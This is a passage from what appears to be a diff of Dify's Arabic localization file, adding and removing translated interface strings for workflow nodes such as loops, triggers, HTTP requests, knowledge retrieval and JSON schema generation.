aggregationGroupTip: 'يسمح تمكين هذه الميزة لمجمع المتغيرات بتجميع مجموعات متعددة من المتغيرات.', - addGroup: 'إضافة مجموعة', - outputVars: { - varDescribe: 'إخراج {{groupName}}', - }, - setAssignVariable: 'تعيين متغير التعيين', - }, - assigner: { - 'assignedVariable': 'المتغير المعين', - 'varNotSet': 'المتغير غير معين', - 'variables': 'المتغيرات', - 'noVarTip': 'انقر على زر "+" لإضافة متغيرات', - 'writeMode': 'وضع الكتابة', - 'writeModeTip': 'وضع الإلحاق: متاح لمتغيرات المصفوفة فقط.', - 'over-write': 'الكتابة الفوقية', - 'append': 'إلحاق', - 'plus': 'إضافة', - 'clear': 'مسح', - 'setVariable': 'تعيين المتغير', - 'selectAssignedVariable': 'حدد المتغير المعين...', - 'setParameter': 'تعيين المعلمة...', - 'operations': { - 'title': 'عملية', - 'over-write': 'الكتابة الفوقية', - 'overwrite': 'الكتابة الفوقية', - 'set': 'تعيين', - 'clear': 'مسح', - 'extend': 'تمديد', - 'append': 'إلحاق', - 'remove-first': 'إزالة الأول', - 'remove-last': 'إزالة الأخير', - '+=': '+=', - '-=': '-=', - '*=': '*=', - '/=': '/=', - }, - 'variable': 'متغير', - 'noAssignedVars': 'لا توجد متغيرات معينة متاحة', - 'assignedVarsDescription': 'يجب أن تكون المتغيرات المعينة متغيرات قابلة للكتابة، مثل متغيرات المحادثة.', - }, - tool: { - authorize: 'تخويل', - inputVars: 'متغيرات الإدخال', - settings: 'الإعدادات', - insertPlaceholder1: 'اكتب أو اضغط', - insertPlaceholder2: 'لإدراج متغير', - outputVars: { - text: 'محتوى تم إنشاؤه بواسطة الأداة', - files: { - title: 'ملفات تم إنشاؤها بواسطة الأداة', - type: 'نوع الدعم. الآن يدعم الصورة فقط', - transfer_method: 'طريقة النقل. القيمة هي remote_url أو local_file', - url: 'رابط الصورة', - upload_file_id: 'معرف ملف التحميل', - }, - json: 'json تم إنشاؤه بواسطة الأداة', - }, - }, - triggerPlugin: { - authorized: 'مخول', - notConfigured: 'لم يتم التكوين', - notAuthorized: 'غير مخول', - selectSubscription: 'تصديق الاشتراك', - availableSubscriptions: 'الاشتراكات المتاحة', - addSubscription: 'إضافة اشتراك جديد', - removeSubscription: 'إزالة الاشتراك', - subscriptionRemoved: 'تمت إزالة الاشتراك بنجاح', - error: 'خطأ', - configuration: 'التكوين', - remove: 'إزالة', - or: 'أو', - useOAuth: 'استخدام OAuth', - useApiKey: 'استخدام مفتاح API', - authenticationFailed: 'فشلت المصادقة', - authenticationSuccess: 'نجحت المصادقة', - oauthConfigFailed: 'فشل تكوين OAuth', - configureOAuthClient: 'تكوين عميل OAuth', - oauthClientDescription: 'تكوين بيانات اعتماد عميل OAuth لتمكين المصادقة', - oauthClientSaved: 'تم حفظ تكوين عميل OAuth بنجاح', - configureApiKey: 'تكوين مفتاح API', - apiKeyDescription: 'تكوين بيانات اعتماد مفتاح API للمصادقة', - apiKeyConfigured: 'تم تكوين مفتاح API بنجاح', - configurationFailed: 'فشل التكوين', - failedToStart: 'فشل بدء تدفق المصادقة', - credentialsVerified: 'تم التحقق من بيانات الاعتماد بنجاح', - credentialVerificationFailed: 'فشل التحقق من بيانات الاعتماد', - verifyAndContinue: 'تحقق ومتابعة', - configureParameters: 'تكوين المعلمات', - parametersDescription: 'تكوين معلمات المشغل والخصائص', - configurationComplete: 'اكتمل التكوين', - configurationCompleteDescription: 'تم تكوين المشغل الخاص بك بنجاح', - configurationCompleteMessage: 'اكتمل تكوين المشغل الخاص بك الآن وهو جاهز للاستخدام.', - parameters: 'المعلمات', - properties: 'الخصائص', - propertiesDescription: 'خصائص تكوين إضافية لهذا المشغل', - noConfigurationRequired: 'لا يلزم تكوين إضافي لهذا المشغل.', - subscriptionName: 'اسم الاشتراك', - subscriptionNameDescription: 'أدخل اسمًا فريدًا لاشتراك المشغل هذا', - subscriptionNamePlaceholder: 'أدخل اسم الاشتراك...', - subscriptionNameRequired: 'اسم الاشتراك مطلوب', - subscriptionRequired: 'الاشتراك مطلوب', - }, - questionClassifiers: { - model: 'النموذج', - inputVars: 'متغيرات الإدخال', - outputVars: { - className: 'اسم الفئة', - usage: 'معلومات استخدام النموذج', - }, - class: 'فئة', - classNamePlaceholder: 'اكتب اسم الفئة الخاصة بك', - advancedSetting: 'إعدادات متقدمة', - topicName: 'اسم الموضوع', - topicPlaceholder: 'اكتب اسم الموضوع الخاص بك', - addClass: 'إضافة فئة', + jsonSchema: { + title: 'مخطط الإخراج المنظم', instruction: 'تعليمات', - instructionTip: 'أدخل تعليمات إضافية لمساعدة مصنف الأسئلة على فهم كيفية تصنيف الأسئلة بشكل أفضل.', - instructionPlaceholder: 'اكتب تعليماتك', - }, - parameterExtractor: { - inputVar: 'متغير الإدخال', - outputVars: { - isSuccess: 'هو نجاح. عند النجاح تكون القيمة 1، عند الفشل تكون القيمة 0.', - errorReason: 'سبب الخطأ', - usage: 'معلومات استخدام النموذج', - }, - extractParameters: 'استخراج المعلمات', - importFromTool: 'استيراد من الأدوات', - addExtractParameter: 'إضافة معلمة استخراج', - addExtractParameterContent: { - name: 'الاسم', - namePlaceholder: 'اسم معلمة الاستخراج', - type: 'النوع', - typePlaceholder: 'نوع معلمة الاستخراج', - description: 'الوصف', - descriptionPlaceholder: 'وصف معلمة الاستخراج', - required: 'مطلوب', - requiredContent: 'مطلوب يستخدم فقط كمرجع لاستدلال النموذج، وليس للتحقق الإلزامي من إخراج المعلمة.', - }, - extractParametersNotSet: 'لم يتم إعداد استخراج المعلمات', - instruction: 'تعليمات', - instructionTip: 'أدخل تعليمات إضافية لمساعدة مستخرج المعلمات على فهم كيفية استخراج المعلمات.', - advancedSetting: 'إعدادات متقدمة', - reasoningMode: 'وضع التفكير', - reasoningModeTip: 'يمكنك اختيار وضع التفكير المناسب بناءً على قدرة النموذج على الاستجابة للتعليمات لاستدعاء الوظيفة أو المطالبات.', - }, - iteration: { - deleteTitle: 'حذف عقدة التكرار؟', - deleteDesc: 'سيؤدي حذف عقدة التكرار إلى حذف جميع العقد الفرعية', - input: 'إدخال', - output: 'متغيرات الإخراج', - iteration_one: '{{count}} تكرار', - iteration_other: '{{count}} تكرارات', - currentIteration: 'التكرار الحالي', - comma: '، ', - error_one: '{{count}} خطأ', - error_other: '{{count}} أخطاء', - parallelMode: 'الوضع المتوازي', - parallelModeUpper: 'الوضع المتوازي', - parallelModeEnableTitle: 'تم تمكين الوضع المتوازي', - parallelModeEnableDesc: 'في الوضع المتوازي، تدعم المهام داخل التكرارات التنفيذ المتوازي. يمكنك تكوين هذا في لوحة الخصائص على اليمين.', - parallelPanelDesc: 'في الوضع المتوازي، تدعم المهام في التكرار التنفيذ المتوازي.', - MaxParallelismTitle: 'الحد الأقصى للتوازي', - MaxParallelismDesc: 'يتم استخدام الحد الأقصى للتوازي للتحكم في عدد المهام التي يتم تنفيذها في وقت واحد في تكرار واحد.', - errorResponseMethod: 'طريقة استجابة الخطأ', - ErrorMethod: { - operationTerminated: 'تم الإنهاء', - continueOnError: 'متابعة عند الخطأ', - removeAbnormalOutput: 'إزالة الإخراج غير الطبيعي', - }, - answerNodeWarningDesc: 'تحذير الوضع المتوازي: قد تتسبب عقد الإجابة وتعيينات متغيرات المحادثة وعمليات القراءة/الكتابة الدائمة داخل التكرارات في حدوث استثناءات.', - flattenOutput: 'تسطيح الإخراج', - flattenOutputDesc: 'عند التمكين، إذا كانت جميع مخرجات التكرار مصفوفات، فسيتم تسطيحها في مصفوفة واحدة. عند التعطيل، ستحافظ المخرجات على هيكل مصفوفة متداخلة.', - }, - loop: { - deleteTitle: 'حذف عقدة الحلقة؟', - deleteDesc: 'سيؤدي حذف عقدة الحلقة إلى إزالة جميع العقد الفرعية', - input: 'إدخال', - output: 'متغير الإخراج', - loop_one: '{{count}} حلقة', - loop_other: '{{count}} حلقات', - currentLoop: 'الحلقة الحالية', - comma: '، ', - error_one: '{{count}} خطأ', - error_other: '{{count}} أخطاء', - breakCondition: 'شرط إنهاء الحلقة', - breakConditionTip: 'يمكن الإشارة فقط إلى المتغيرات داخل الحلقات ذات شروط الإنهاء ومتغيرات المحادثة.', - loopMaxCount: 'الحد الأقصى لعدد الحلقات', - loopMaxCountError: 'الرجاء إدخال حد أقصى صالح لعدد الحلقات، يتراوح بين 1 و {{maxCount}}', - errorResponseMethod: 'طريقة استجابة الخطأ', - ErrorMethod: { - operationTerminated: 'تم الإنهاء', - continueOnError: 'متابعة عند الخطأ', - removeAbnormalOutput: 'إزالة الإخراج غير الطبيعي', - }, - loopVariables: 'متغيرات الحلقة', - initialLoopVariables: 'متغيرات الحلقة الأولية', - finalLoopVariables: 'متغيرات الحلقة النهائية', - setLoopVariables: 'تعيين المتغيرات داخل نطاق الحلقة', - variableName: 'اسم المتغير', - inputMode: 'وضع الإدخال', - exitConditionTip: 'تحتاج عقدة الحلقة إلى شرط خروج واحد على الأقل', - loopNode: 'عقدة الحلقة', - currentLoopCount: 'عدد الحلقات الحالي: {{count}}', - totalLoopCount: 'إجمالي عدد الحلقات: {{count}}', - }, - note: { - addNote: 'إضافة ملاحظة', - editor: { - placeholder: 'اكتب ملاحظتك...', - small: 'صغير', - medium: 'متوسط', - large: 'كبير', - bold: 'غامق', - italic: 'مائل', - strikethrough: 'يتوسطه خط', - link: 'رابط', - openLink: 'فتح', - unlink: 'إلغاء الرابط', - enterUrl: 'أدخل URL...', - invalidUrl: 'URL غير صالح', - bulletList: 'قائمة نقطية', - showAuthor: 'عرض المؤلف', - }, - }, - docExtractor: { - inputVar: 'متغير الإدخال', - outputVars: { - text: 'نص مستخرج', - }, - supportFileTypes: 'أنواع الملفات المدعومة: {{types}}.', - learnMore: 'تعرف على المزيد', - }, - listFilter: { - inputVar: 'متغير الإدخال', - filterCondition: 'شرط التصفية', - filterConditionKey: 'مفتاح شرط التصفية', - extractsCondition: 'استخراج العنصر N', - filterConditionComparisonOperator: 'مشغل مقارنة شرط التصفية', - filterConditionComparisonValue: 'قيمة شرط التصفية', - selectVariableKeyPlaceholder: 'حدد مفتاح المتغير الفرعي', - limit: 'أعلى N', - orderBy: 'ترتيب حسب', - asc: 'ASC', - desc: 'DESC', - outputVars: { - result: 'نتيجة التصفية', - first_record: 'السجل الأول', - last_record: 'السجل الأخير', - }, - }, - agent: { - strategy: { - label: 'استراتيجية الوكيل', - tooltip: 'تحدد استراتيجيات الوكيل المختلفة كيفية تخطيط النظام وتنفيذ استدعاءات الأدوات متعددة الخطوات', - shortLabel: 'استراتيجية', - configureTip: 'يرجى تكوين استراتيجية الوكيل.', - configureTipDesc: 'بعد تكوين استراتيجية الوكيل، ستقوم هذه العقدة تلقائيًا بتحميل التكوينات المتبقية. ستؤثر الاستراتيجية على آلية التفكير في الأدوات متعددة الخطوات. ', - selectTip: 'حدد استراتيجية الوكيل', - searchPlaceholder: 'بحث في استراتيجية الوكيل', - }, - learnMore: 'تعرف على المزيد', - pluginNotInstalled: 'هذا الملحق غير مثبت', - pluginNotInstalledDesc: 'تم تثبيت هذا الملحق من GitHub. يرجى الانتقال إلى الملحقات لإعادة التثبيت', - linkToPlugin: 'رابط للإضافات', - pluginInstaller: { - install: 'تثبيت', - installing: 'جاري التثبيت', - }, - modelNotInMarketplace: { - title: 'النموذج غير مثبت', - desc: 'تم تثبيت هذا النموذج من مستودع محلي أو GitHub. الرجاء استخدامه بعد التثبيت.', - manageInPlugins: 'إدارة في الإضافات', - }, - modelNotSupport: { - title: 'نموذج غير مدعوم', - desc: 'لا يوفر إصدار الملحق المثبت هذا النموذج.', - descForVersionSwitch: 'لا يوفر إصدار الملحق المثبت هذا النموذج. انقر لتبديل الإصدار.', - }, - configureModel: 'تكوين النموذج', - notAuthorized: 'غير مخول', - model: 'النموذج', - toolbox: 'صندوق الأدوات', - strategyNotSet: 'لم يتم تعيين استراتيجية الوكيل', - tools: 'الأدوات', - maxIterations: 'الحد الأقصى للتكرارات', - modelNotSelected: 'النموذج غير محدد', - modelNotInstallTooltip: 'هذا النموذج غير مثبت', - toolNotInstallTooltip: '{{tool}} غير مثبت', - toolNotAuthorizedTooltip: '{{tool}} غير مخول', - strategyNotInstallTooltip: '{{strategy}} غير مثبتة', - unsupportedStrategy: 'استراتيجية غير مدعومة', - pluginNotFoundDesc: 'تم تثبيت هذا الملحق من GitHub. يرجى الانتقال إلى الملحقات لإعادة التثبيت', - strategyNotFoundDesc: 'لا يوفر إصدار الملحق المثبت هذه الاستراتيجية.', - strategyNotFoundDescAndSwitchVersion: 'لا يوفر إصدار الملحق المثبت هذه الاستراتيجية. انقر لتبديل الإصدار.', - modelSelectorTooltips: { - deprecated: 'تم إهمال هذا النموذج', - }, - outputVars: { - text: 'محتوى تم إنشاؤه بواسطة الوكيل', - usage: 'معلومات استخدام النموذج', - files: { - title: 'ملفات تم إنشاؤها بواسطة الوكيل', - type: 'نوع الدعم. الآن يدعم الصورة فقط', - transfer_method: 'طريقة النقل. القيمة هي remote_url أو local_file', - url: 'رابط الصورة', - upload_file_id: 'معرف ملف التحميل', - }, - json: 'json تم إنشاؤه بواسطة الوكيل', - }, - checkList: { - strategyNotSelected: 'الاستراتيجية غير محددة', - }, - installPlugin: { - title: 'تثبيت الإضافة', - desc: 'على وشك تثبيت الإضافة التالية', - changelog: 'سجل التغييرات', - install: 'تثبيت', - cancel: 'إلغاء', - }, - clickToViewParameterSchema: 'انقر لعرض مخطط المعلمة', - parameterSchema: 'مخطط المعلمة', - }, - dataSource: { - supportedFileFormats: 'تنسيقات الملفات المدعومة', - supportedFileFormatsPlaceholder: 'امتداد الملف، مثل doc', - add: 'إضافة مصدر بيانات', - }, - knowledgeBase: { - chunkStructure: 'هيكل القطعة', - chooseChunkStructure: 'اختر هيكل القطعة', - chunkStructureTip: { - title: 'الرجاء اختيار هيكل القطعة', - message: 'تدعم قاعدة المعرفة Dify ثلاثة هياكل للقطع: عام، وأصل-طفل، وسؤال وجواب. يمكن أن يكون لكل قاعدة معرفة هيكل واحد فقط. يجب أن يتوافق الإخراج من العقدة السابقة مع هيكل القطعة المحدد. لاحظ أن اختيار هيكل القطع يؤثر على طرق الفهرسة المتاحة.', - learnMore: 'تعرف على المزيد', - }, - changeChunkStructure: 'تغيير هيكل القطعة', - chunksInput: 'القطع', - chunksInputTip: 'متغير الإدخال لعقدة قاعدة المعرفة هو Pieces. نوع المتغير هو كائن بمخطط JSON محدد يجب أن يكون متسقًا مع هيكل القطعة المحدد.', - aboutRetrieval: 'حول طريقة الاسترجاع.', - chunkIsRequired: 'هيكل القطعة مطلوب', - indexMethodIsRequired: 'طريقة الفهرسة مطلوبة', - chunksVariableIsRequired: 'متغير القطع مطلوب', - embeddingModelIsRequired: 'نموذج التضمين مطلوب', - embeddingModelIsInvalid: 'نموذج التضمين غير صالح', - retrievalSettingIsRequired: 'إعداد الاسترجاع مطلوب', - rerankingModelIsRequired: 'نموذج إعادة الترتيب مطلوب', - rerankingModelIsInvalid: 'نموذج إعادة الترتيب غير صالح', - }, - triggerSchedule: { - title: 'الجدول الزمني', - nodeTitle: 'جدولة المشغل', - notConfigured: 'لم يتم التكوين', - useCronExpression: 'استخدم تعبير cron', - useVisualPicker: 'استخدم منتقي مرئي', - frequency: { - label: 'التكرار', - hourly: 'كل ساعة', - daily: 'يوميًا', - weekly: 'أسبوعيًا', - monthly: 'شهريًا', - }, - selectFrequency: 'حدد التكرار', - frequencyLabel: 'التكرار', - nextExecution: 'التنفيذ التالي', - weekdays: 'أيام الأسبوع', - time: 'الوقت', - cronExpression: 'تعبير Cron', - nextExecutionTime: 'وقت التنفيذ التالي', - nextExecutionTimes: 'أوقات التنفيذ الـ 5 التالية', - startTime: 'وقت البدء', - executeNow: 'التنفيذ الآن', - selectDateTime: 'حدد التاريخ والوقت', - hours: 'الساعات', - minutes: 'الدقائق', - onMinute: 'في الدقيقة', - days: 'الأيام', - lastDay: 'اليوم الأخير', - lastDayTooltip: 'ليست كل الأشهر 31 يومًا. استخدم خيار "اليوم الأخير" لتحديد اليوم الأخير من كل شهر.', - mode: 'الوضع', - timezone: 'المنطقة الزمنية', - visualConfig: 'التكوين المرئي', - monthlyDay: 'يوم شهري', - executionTime: 'وقت التنفيذ', - invalidTimezone: 'منطقة زمنية غير صالحة', - invalidCronExpression: 'تعبير cron غير صالح', - noValidExecutionTime: 'لا يمكن حساب وقت تنفيذ صالح', - executionTimeCalculationError: 'فشل حساب أوقات التنفيذ', - invalidFrequency: 'تكرار غير صالح', - invalidStartTime: 'وقت البدء غير صالح', - startTimeMustBeFuture: 'يجب أن يكون وقت البدء في المستقبل', - invalidTimeFormat: 'تنسيق الوقت غير صالح (المتوقع HH:MM AM/PM)', - invalidWeekday: 'يوم أسبوع غير صالح: {{weekday}}', - invalidMonthlyDay: 'يجب أن يكون اليوم الشهري بين 1-31 أو "last"', - invalidOnMinute: 'يجب أن تكون الدقيقة بين 0-59', - invalidExecutionTime: 'وقت التنفيذ غير صالح', - executionTimeMustBeFuture: 'يجب أن يكون وقت التنفيذ في المستقبل', - }, - triggerWebhook: { - title: 'مشغل Webhook', - nodeTitle: '🔗 مشغل Webhook', - configPlaceholder: 'سيتم تنفيذ تكوين مشغل webhook هنا', - webhookUrl: 'Webhook URL', - webhookUrlPlaceholder: 'انقر فوق إنشاء لإنشاء عنوان URL لـ webhook', + promptTooltip: 'تحويل الوصف النصي إلى هيكل مخطط JSON موحد.', + promptPlaceholder: 'صف مخطط JSON الخاص بك ...', generate: 'توليد', - copy: 'نسخ', - test: 'اختبار', - urlGenerated: 'تم إنشاء عنوان URL لـ webhook بنجاح', - urlGenerationFailed: 'فشل إنشاء عنوان URL لـ webhook', - urlCopied: 'تم نسخ عنوان URL إلى الحافظة', - method: 'الطريقة', - contentType: 'نوع المحتوى', - queryParameters: 'معلمات الاستعلام', - headerParameters: 'معلمات الرأس', - requestBodyParameters: 'معلمات جسم الطلب', - parameterName: 'اسم المتغير', - varName: 'اسم المتغير', - varType: 'النوع', - varNamePlaceholder: 'أدخل اسم المتغير...', + import: 'استيراد من JSON', + generateJsonSchema: 'توليد مخطط JSON', + generationTip: 'يمكنك استخدام اللغة الطبيعية لإنشاء مخطط JSON بسرعة.', + generating: 'توليد مخطط JSON ...', + generatedResult: 'النتائج المولدة', + resultTip: 'إليك النتائج المولدة. إذا لم تكن راضيًا، يمكنك العودة وتعديل مطالبتك.', + back: 'رجوع', + regenerate: 'إعادة التوليد', + apply: 'تطبيق', + doc: 'معرفة المزيد عن الإخراج المنظم', + resetDefaults: 'إعادة تعيين', required: 'مطلوب', - addParameter: 'إضافة', - addHeader: 'إضافة', - noParameters: 'لم يتم تكوين أي معلمات', - noQueryParameters: 'لم يتم تكوين أي معلمات استعلام', - noHeaders: 'لم يتم تكوين أي رؤوس', - noBodyParameters: 'لم يتم تكوين أي معلمات جسم', - debugUrlTitle: 'للتشغيل الاختياري، استخدم دائمًا هذا العنوان', - debugUrlCopy: 'انقر للنسخ', - debugUrlCopied: 'تم النسخ!', - debugUrlPrivateAddressWarning: 'يبدو أن عنوان URL هذا عنوان داخلي، مما قد يتسبب في فشل طلبات webhook. يمكنك تغيير TRIGGER_URL إلى عنوان عام.', - errorHandling: 'معالجة الأخطاء', - errorStrategy: 'معالجة الأخطاء', - responseConfiguration: 'استجابة', - asyncMode: 'وضع غير متزامن', - statusCode: 'رمز الحالة', - responseBody: 'جسم الاستجابة', - responseBodyPlaceholder: 'اكتب جسم الاستجابة هنا', - headers: 'الرؤوس', - validation: { - webhookUrlRequired: 'عنوان URL لـ Webhook مطلوب', - invalidParameterType: 'نوع المعلمة غير صالح "{{type}}" للمعلمة "{{name}}"', + addField: 'إضافة حقل', + addChildField: 'إضافة حقل فرعي', + showAdvancedOptions: 'عرض الخيارات المتقدمة', + stringValidations: 'التحقق من صحة السلسلة', + fieldNamePlaceholder: 'اسم الحقل', + descriptionPlaceholder: 'إضافة وصف', + warningTips: { + saveSchema: 'الرجاء إنهاء تحرير الحقل الحالي قبل حفظ المخطط', }, }, }, - triggerStatus: { - enabled: 'مشغل', - disabled: 'مشغل • معطل', - }, - entryNodeStatus: { - enabled: 'بدء', - disabled: 'بدء • معطل', - }, - tracing: { - stopBy: 'توقف بواسطة {{user}}', - }, - versionHistory: { - title: 'الإصدارات', - currentDraft: 'المسودة الحالية', - latest: 'الأحدث', - filter: { - all: 'الكل', - onlyYours: 'الخاص بك فقط', - onlyShowNamedVersions: 'إظهار الإصدارات المسماة فقط', - reset: 'إعادة تعيين التصفية', - empty: 'لم يتم العثور على سجل إصدار مطابق', + knowledgeRetrieval: { + queryVariable: 'متغير الاستعلام', + knowledge: 'المعرفة', + outputVars: { + output: 'استرجاع البيانات المقسمة', + content: 'المحتوى المقسم', + title: 'العنوان المقسم', + icon: 'أيقونة مقسمة', + url: 'عنوان URL المقسم', + metadata: 'بيانات وصفية أخرى', + files: 'الملفات المسترجعة', }, - defaultName: 'إصدار بدون عنوان', - nameThisVersion: 'تسمية هذا الإصدار', - editVersionInfo: 'تعديل معلومات الإصدار', - copyId: 'نسخ المعرف', - editField: { - title: 'العنوان', - releaseNotes: 'ملاحظات الإصدار', - titleLengthLimit: 'لا يمكن أن يتجاوز العنوان {{limit}} حرفًا', - releaseNotesLengthLimit: 'لا يمكن أن تتجاوز ملاحظات الإصدار {{limit}} حرفًا', - }, - releaseNotesPlaceholder: 'صف ما تغير', - restorationTip: 'بعد استعادة الإصدار، سيتم استبدال المسودة الحالية.', - deletionTip: 'الحذف لا رجعة فيه، يرجى التأكد.', - action: { - restoreSuccess: 'تم استعادة الإصدار', - restoreFailure: 'فشل استعادة الإصدار', - deleteSuccess: 'تم حذف الإصدار', - deleteFailure: 'فشل حذف الإصدار', - updateSuccess: 'تم تحديث الإصدار', - updateFailure: 'فشل تحديث الإصدار', - copyIdSuccess: 'تم نسخ المعرف إلى الحافظة', - }, - }, - debug: { - settingsTab: 'الإعدادات', - lastRunTab: 'آخر تشغيل', - relationsTab: 'العلاقات', - copyLastRun: 'نسخ آخر تشغيل', - noLastRunFound: 'لم يتم العثور على تشغيل سابق', - noMatchingInputsFound: 'لم يتم العثور على مدخلات مطابقة من آخر تشغيل', - lastRunInputsCopied: 'تم نسخ {{count}} إدخال (إدخالات) من آخر تشغيل', - copyLastRunError: 'فشل نسخ مدخلات آخر تشغيل', - noData: { - description: 'سيتم عرض نتائج آخر تشغيل هنا', - runThisNode: 'تشغيل هذه العقدة', - }, - variableInspect: { - title: 'فحص المتغير', - emptyTip: 'بعد تخطي عقدة على اللوحة أو تشغيل عقدة خطوة بخطوة، يمكنك عرض القيمة الحالية لمتغير العقدة في فحص المتغير', - emptyLink: 'تعرف على المزيد', - clearAll: 'إعادة تعيين الكل', - clearNode: 'مسح المتغير المخبأ', - resetConversationVar: 'إعادة تعيين متغير المحادثة إلى القيمة الافتراضية', - view: 'عرض السجل', - edited: 'تم التعديل', - reset: 'إعادة تعيين إلى قيمة آخر تشغيل', - listening: { - title: 'الاستماع للأحداث من المشغلات...', - tip: 'يمكنك الآن محاكاة مشغلات الحدث عن طريق إرسال طلبات اختبار إلى نقطة نهاية HTTP {{nodeName}} أو استخدامها كعنوان URL لرد الاتصال لتصحيح أخطاء الحدث المباشر. يمكن عرض جميع المخرجات مباشرة في فحص المتغير.', - tipPlugin: 'الآن يمكنك إنشاء أحداث في {{- pluginName}}، واسترجاع المخرجات من هذه الأحداث في فحص المتغير.', - tipSchedule: 'الاستماع للأحداث من مشغلات الجدول.\nالتشغيل المجدول التالي: {{nextTriggerTime}}', - tipFallback: 'انتظار أحداث المشغل الواردة. ستظهر المخرجات هنا.', - defaultNodeName: 'هذا المشغل', - defaultPluginName: 'مشغل الإضافة هذا', - defaultScheduleTime: 'لم يتم التكوين', - selectedTriggers: 'المشغلات المحددة', - stopButton: 'توقف', + metadata: { + title: 'تصفية البيانات الوصفية', + tip: 'تصفية البيانات الوصفية هي عملية استخدام سمات البيانات الوصفية (مثل العلامات، الفئات، أو أذونات الوصول) لتحسين والتحكم في استرجاع المعلومات ذات الصلة داخل النظام.', + options: { + disabled: { + title: 'معطل', + subTitle: 'عدم تمكين تصفية البيانات الوصفية', + }, + automatic: { + title: 'تلقائي', + subTitle: 'إنشاء شروط تصفية البيانات الوصفية تلقائيًا بناءً على استعلام المستخدم', + desc: 'إنشاء شروط تصفية البيانات الوصفية تلقائيًا بناءً على متغير الاستعلام', + }, + manual: { + title: 'يدوي', + subTitle: 'إضافة شروط تصفية البيانات الوصفية يدويًا', + }, }, - trigger: { - normal: 'فحص المتغير', - running: 'التخزين المؤقت لحالة التشغيل', - stop: 'إيقاف التشغيل', - cached: 'عرض المتغيرات المخبأة', - clear: 'مسح', + panel: { + title: 'شروط تصفية البيانات الوصفية', + conditions: 'الشروط', + add: 'إضافة شرط', + search: 'بحث في البيانات الوصفية', + placeholder: 'أدخل قيمة', + datePlaceholder: 'اختر وقتًا...', + select: 'حدد متغيرًا...', }, - envNode: 'البيئة', - chatNode: 'المحادثة', - systemNode: 'النظام', - exportToolTip: 'تصدير متغير كملف', - largeData: 'بيانات كبيرة، معاينة للقراءة فقط. تصدير لعرض الكل.', - largeDataNoExport: 'بيانات كبيرة - معاينة جزئية فقط', - export: 'تصدير', }, - lastOutput: 'آخر إخراج', - relations: { - dependencies: 'التبعيات', - dependents: 'المعتمدون', - dependenciesDescription: 'العقد التي تعتمد عليها هذه العقدة', - dependentsDescription: 'العقد التي تعتمد على هذه العقدة', - noDependencies: 'لا توجد تبعيات', - noDependents: 'لا يوجد معتمدون', + queryText: 'نص الاستعلام', + queryAttachment: 'استعلام الصور', + }, + http: { + inputVars: 'متغيرات الإدخال', + api: 'API', + apiPlaceholder: 'أدخل URL، واكتب \'/\' لإدراج متغير', + extractListPlaceholder: 'أدخل فهرس عنصر القائمة، واكتب \'/\' لإدراج متغير', + notStartWithHttp: 'يجب أن يبدأ API بـ http:// أو https://', + key: 'المفتاح', + type: 'النوع', + value: 'القيمة', + bulkEdit: 'تحرير مجمع', + keyValueEdit: 'تحرير المفتاح والقيمة', + headers: 'الرؤوس', + params: 'المعلمات', + body: 'الجسم', + binaryFileVariable: 'متغير ملف ثنائي', + outputVars: { + body: 'محتوى الاستجابة', + statusCode: 'رمز حالة الاستجابة', + headers: 'قائمة رؤوس الاستجابة JSON', + files: 'قائمة الملفات', + }, + authorization: { + 'authorization': 'تخويل', + 'authorizationType': 'نوع التخويل', + 'no-auth': 'لا شيء', + 'api-key': 'مفتاح API', + 'auth-type': 'نوع المصادقة', + 'basic': 'أساسي', + 'bearer': 'Bearer', + 'custom': 'مخصص', + 'api-key-title': 'مفتاح API', + 'header': 'Header', + }, + insertVarPlaceholder: 'اكتب \'/\' لإدراج متغير', + timeout: { + title: 'المهلة', + connectLabel: 'مهلة الاتصال', + connectPlaceholder: 'أدخل مهلة الاتصال بالثواني', + readLabel: 'مهلة القراءة', + readPlaceholder: 'أدخل مهلة القراءة بالثواني', + writeLabel: 'مهلة الكتابة', + writePlaceholder: 'أدخل مهلة الكتابة بالثواني', + }, + curl: { + title: 'استيراد من cURL', + placeholder: 'لصق سلسلة cURL هنا', + }, + verifySSL: { + title: 'التحقق من شهادة SSL', + warningTooltip: 'لا يوصى بتعطيل التحقق من SSL لبيئات الإنتاج. يجب استخدامه فقط في التطوير أو الاختبار، حيث إنه يجعل الاتصال عرضة لتهديدات الأمان مثل هجمات الوسيط.', }, }, - onboarding: { - title: 'حدد عقدة البداية للبدء', - description: 'لدى عقد البداية المختلفة قدرات مختلفة. لا تقلق، يمكنك دائمًا تغييرها لاحقًا.', - userInputFull: 'إدخال المستخدم (عقدة البداية الأصلية)', - userInputDescription: 'عقدة البداية التي تسمح بتعيين متغيرات إدخال المستخدم، مع إمكانيات تطبيق الويب، وواجهة برمجة تطبيقات الخدمة، وخادم MCP، وقدرات سير العمل كأداة.', - trigger: 'مشغل', - triggerDescription: 'يمكن أن تعمل المشغلات كعقدة بداية لسير العمل، مثل المهام المجدولة، أو خطافات الويب المخصصة، أو التكامل مع تطبيقات أخرى.', - back: 'رجوع', + code: { + inputVars: 'متغيرات الإدخال', + outputVars: 'متغيرات الإخراج', + advancedDependencies: 'التبعيات المتقدمة', + advancedDependenciesTip: 'أضف بعض التبعيات المحملة مسبقًا التي تستغرق وقتًا أطول للاستهلاك أو ليست افتراضية مضمنة هنا', + searchDependencies: 'بحث في التبعيات', + syncFunctionSignature: 'مزامنة توقيع الوظيفة للكود', + }, + templateTransform: { + inputVars: 'متغيرات الإدخال', + code: 'الكود', + codeSupportTip: 'يدعم Jinja2 فقط', + outputVars: { + output: 'المحتوى المحول', + }, + }, + ifElse: { + if: 'If', + else: 'Else', + elseDescription: 'يستخدم لتحديد المنطق الذي ينبغي تنفيذه عندما لا يتم استيفاء شرط if.', + and: 'و', + or: 'أو', + operator: 'المشغل', + notSetVariable: 'الرجاء تعيين المتغير أولاً', + comparisonOperator: { + 'contains': 'يحتوي على', + 'not contains': 'لا يحتوي على', + 'start with': 'يبدأ بـ', + 'end with': 'ينتهي بـ', + 'is': 'هو', + 'is not': 'ليس', + 'empty': 'فارغ', + 'not empty': 'ليس فارغًا', + 'null': 'null', + 'not null': 'ليس null', + 'in': 'في', + 'not in': 'ليس في', + 'all of': 'كل من', + 'exists': 'موجود', + 'not exists': 'غير موجود', + 'before': 'قبل', + 'after': 'بعد', + }, + optionName: { + image: 'صورة', + doc: 'مستند', + audio: 'صوت', + video: 'فيديو', + localUpload: 'تحميل محلي', + url: 'URL', + }, + enterValue: 'أدخل قيمة', + addCondition: 'إضافة شرط', + conditionNotSetup: 'لم يتم إعداد الشرط', + selectVariable: 'حدد متغيرًا...', + addSubVariable: 'متغير فرعي', + select: 